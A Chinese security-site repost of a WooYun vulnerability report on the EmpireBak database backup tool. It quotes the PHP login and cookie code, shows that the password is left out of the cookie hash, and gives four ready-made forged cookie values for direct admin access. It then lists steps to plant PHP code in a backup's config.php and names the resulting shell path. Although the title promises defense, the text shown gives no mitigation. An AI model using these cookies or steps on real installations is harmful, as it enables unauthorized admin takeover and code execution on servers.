帝国备份王(Empirebak)万能cookie及拿shell方法与防御

所属分类: 网络安全 / 脚本攻防 阅读数: 254
收藏 0 赞 0 分享
转自wooyun http://www.wooyun.org/bugs/wooyun-2014-078591
1.伪造cookie登录系统(其实这一步多余的,大多用户连密码都没改,都是默认的123456)

登录成功设置4个cookie,看代码

PHP Code复制内容到剪贴板
  1. function login($lusername,$lpassword,$key,$lifetime=0){    
  2. global $set_username,$set_password,$set_loginauth,$set_loginkey;    
  3. if(emptyempty($lusername)||emptyempty($lpassword)) {     
  4. printerror("EmptyLoginUser","index.php");     
  5. }    
  6. //验证码    
  7. if(!$set_loginkey)    
  8. {    
  9. if($key<>getcvar('checkkey')||emptyempty($key))    
  10. {    
  11. printerror("FailLoginKey","index.php");    
  12. }    
  13. }    
  14. if(md5($lusername)<>md5($set_username)||md5($lpassword)<>$set_password)    
  15. {    
  16. printerror("ErrorUser","index.php");    
  17. }    
  18. //认证码    
  19. if($set_loginauth&$set_loginauth!=$_POST['loginauth'])    
  20. {    
  21. printerror("ErrorLoginAuth","index.php");    
  22. }    
  23. $logintime=time();    
  24. $rnd=make_password(12);//生成随机字符    
  25. $s1=esetcookie("bakusername",$lusername,0);    
  26. $s2=esetcookie("bakrnd",$rnd,0);//随机字符    
  27. $s3=esetcookie("baklogintime",$logintime,0);    
  28. Ebak_SCookieRnd($lusername,$rnd);//    
  29. if(!$s1||!$s2)    
  30. {    
  31. printerror("NotOpenCookie","index.php");    
  32. }    
  33. printerror("LoginSuccess","admin.php");    
  34. }  

再看看make_password函数

PHP Code复制内容到剪贴板
  1. function make_password($pw_length){    
  2. $low_ascii_bound=50;    
  3. $upper_ascii_bound=122;    
  4. $notuse=array(58,59,60,61,62,63,64,73,79,91,92,93,94,95,96,108,111);    
  5. while($i<$pw_length)    
  6. {    
  7. mt_srand((double)microtime()*1000000);    
  8. $randnum=mt_rand($low_ascii_bound,$upper_ascii_bound);    
  9. if(!in_array($randnum,$notuse))    
  10. {    
  11. $password1=$password1.chr($randnum);    
  12. $i++;    
  13. }    
  14. }    
  15. return $password1;    
  16. }  

这个函数只是生成随机数,再看看Ebak_SCookieRnd函数

PHP Code复制内容到剪贴板
  1. function Ebak_SCookieRnd($username,$rnd){    
  2. global $set_loginrnd;//$set_loginrnd为config.php里面的验证随机码    
  3. $ckpass=md5(md5($rnd.$set_loginrnd).'-'.$rnd.'-'.$username.'-');//没有把密码加进去,于是漏洞产生了    
  4. esetcookie("loginebakckpass",$ckpass,0);    
  5. }  

下面给出万能cookie(key:value):

XML/HTML Code复制内容到剪贴板
  1. ebak_loginebakckpass:119770adb578053dcb383f67a81bcbc6    
  2. ebak_bakrnd:35y5cCnnA4Kh    
  3. ebak_bakusername:admin    
  4. ebak_baklogintime:4070883661  

使用以上cookie即可直接访问admin.php

2.拿shell

后台参数设置一般都设置好了,如果不能连接数据库,可以在数据库设置里填个自己的远程数据库

备份数据,随便找个数据库备份,

然后到替换目录文件内容里,选择刚才备份的数据库,

将”$b_table=”

替换成

“phpinfo();

$b_table=”


这里shell的路径就是bdata/mysql_20141007221849/config.php

更多精彩内容其他人还在看

DedeCms V5.6 本地包含里的上传漏洞(可是那包含漏洞已经公布)

DedeCms V5.6 本地包含里的上传漏洞(可是那包含漏洞已经公布) ,使用dedecms5.6的朋友可以参考下。
收藏 0 赞 0 分享

DEDECMS 爆严重安全漏洞 免账号密码直接进入后台

众所周知,因使用简单、客户群多,织梦CMS一直被爆出许多漏洞。今天小编在群里得到织梦官方论坛某版主可靠消息:DEDECMS爆严重安全漏洞,近期官方会发布相关补丁,望大家及时关注补丁动态。
收藏 0 赞 0 分享

常用的一些注入命令 方便一下大家

常用的一些注入命令 方便一下大家对自己的网站做下安全测试。不建议搞破坏。
收藏 0 赞 0 分享

IPC$ 扫描和IPC$漏洞的防范小结

IPC$(Internet Process Connection)是共享
收藏 0 赞 0 分享

aspcms企业建站系统0day漏洞介绍

aspcms企业建站系统0day 2.0以上通杀2011-08-14 19:21aspcms开发的全新内核的开源企业建站系统,能够胜任企业多种建站需求,并且支持模版自定义、支持扩展插件等等,能够在短时间内完成企业建站。
收藏 0 赞 0 分享

MYSQL_OUTPUT 脱裤(脱库)通用脚本(修正版)

感谢各位的测试 , 下次再也不发垃圾脚本了,之前那个大家转走的都修正下吧 ,问题太多了. (几乎都没测试过)下面这个是我重新修改下的.
收藏 0 赞 0 分享

[PHP是世界上最好的语言] 不信你看这款PHP写的敲诈者木马

有个笑话:女的说,你们能让论坛上的人吵起来,我就做你女朋友。男的发了一句话:PHP是世界上最好的语言。瞬间论坛就炸锅了,女的说好吧,我同意了,咱们去吃饭吧。男的:不!我一定要说服他们PHP必须是世界上最好的语言。今天揭秘一个“最好的语言”编写的木马
收藏 0 赞 0 分享

前端安全之XSS攻击

这篇文章主要为大家介绍了基于反射的XSS攻击,主要依靠站点服务端返回脚本,在客户端触发执行从而发起Web攻击,需要的朋友可以参考下
收藏 0 赞 0 分享

记 FineUI 官方论坛discuz所遭受的一次真实网络攻击

这篇文章主要介绍了记 FineUI 官方论坛discuz所遭受的一次真实网络攻击,需要的朋友可以参考下
收藏 0 赞 0 分享

PHP类型网站的万能密码

说实话如果一个网站的前台都是注入漏洞,那么凭经验,万能密码进后台的几率基本上是百分之百。
收藏 0 赞 0 分享
查看更多